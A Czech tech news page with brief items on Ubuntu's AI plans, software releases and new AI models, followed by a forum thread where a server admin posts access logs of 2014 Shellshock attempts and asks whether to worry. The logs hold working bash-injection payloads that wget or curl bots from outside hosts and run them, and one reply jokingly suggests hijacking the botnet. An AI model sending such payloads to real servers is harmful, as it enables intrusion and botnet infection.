Jon Seager z Canonicalu včera na Ubuntu Community Hubu popsal budoucnost AI v Ubuntu. Dnes upřesnil: AI nástroje budou k dispozici jako Snap balíčky, vždy je může uživatel odinstalovat. Ve výchozím nastavení budou všechny AI nástroje používat lokální AI modely.
Nový ovladač Steam Controller jde do prodeje 4. května. Cena je 99 eur.
Greg Kroah-Hartman začal používat AI asistenta pojmenovaného gkh_clanker_t1000. V commitech se objevuje "Assisted-by: gkh_clanker_t1000". Na social.kernel.org publikoval jeho fotografii. Jedná se o Framework Desktop s AMD Ryzen AI Max a lokální LLM.
Ubuntu 26.10 bude Stonking Stingray (úžasný rejnok).
Webový prohlížeč Dillo (Wikipedie) byl vydán ve verzi 3.3.0. S experimentální podporou FLTK 1.4. S příkazem dilloc pro ovládání prohlížeče z příkazové řádky. Vývoj prohlížeče se přesunul z GitHubu na vlastní doménu dillo-browser.org (Git).
Byl publikován přehled dění a novinek z vývoje Asahi Linuxu, tj. Linuxu pro Apple Silicon. Vývojáři v přehledu vypíchli vylepšenou instalaci, podporu senzoru okolního světla, úsporu energie, opravy Bluetooth nebo zlepšení audia. Vývoj lze podpořit na Open Collective a GitHub Sponsors.
raylib (Wikipedie), tj. multiplatformní open-source knihovna pro vývoj grafických aplikací a her, byla vydána ve verzi 6.0.
Nové verze AI modelů. Společnost OpenAI představila GPT‑5.5. Společnost DeepSeek představila DeepSeek V4.
Nová čísla časopisů od nakladatelství Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 164 (pdf) a Hello World 29 (pdf).
Bylo oznámeno, že webový prohlížeč Opera GX zaměřený na hráče počítačových her je už také na Flathubu and Snapcraftu.
74.201.85.75 - - [28/Sep/2014:08:22:40 +0200] "GET / HTTP/1.0" 200 3171 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
74.201.85.75 - - [28/Sep/2014:08:22:40 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 493 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
74.201.85.75 - - [28/Sep/2014:08:22:40 +0200] "GET /test HTTP/1.0" 404 482 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
94.32.106.53 - - [28/Sep/2014:11:07:18 +0200] "GET / HTTP/1.0" 200 3171 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
54.251.83.67 - - [26/Sep/2014:21:42:29 +0200] "GET / HTTP/1.1" 200 3152 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
173.45.100.18 - - [27/Sep/2014:22:38:02 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 488 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
ma mne to znepokojit?
Na serveru mi bezi pouze php weby, zadne bash cgi skripty (alespon o zadnych nevim).
ma mne to znepokojit?Ne. Pokud tě to baví, můžeš si ten škodlivý kód stáhnout, podívat se, jak komunikuje, a zkusit, jestli nemají v komunikaci díru, pomocí které by je šlo vyownovat a botnet jim ukrást. Často mají.
Pokud tě to baví, můžeš si ten škodlivý kód stáhnout, podívat se, jak komunikuje, a zkusit, jestli nemají v komunikaci díru, pomocí které by je šlo vyownovat a botnet jim ukrást. Často mají.Hm, tohle vypadá na nějaký IRC DDOS crap, tak asi nic.
Tiskni
Sdílej: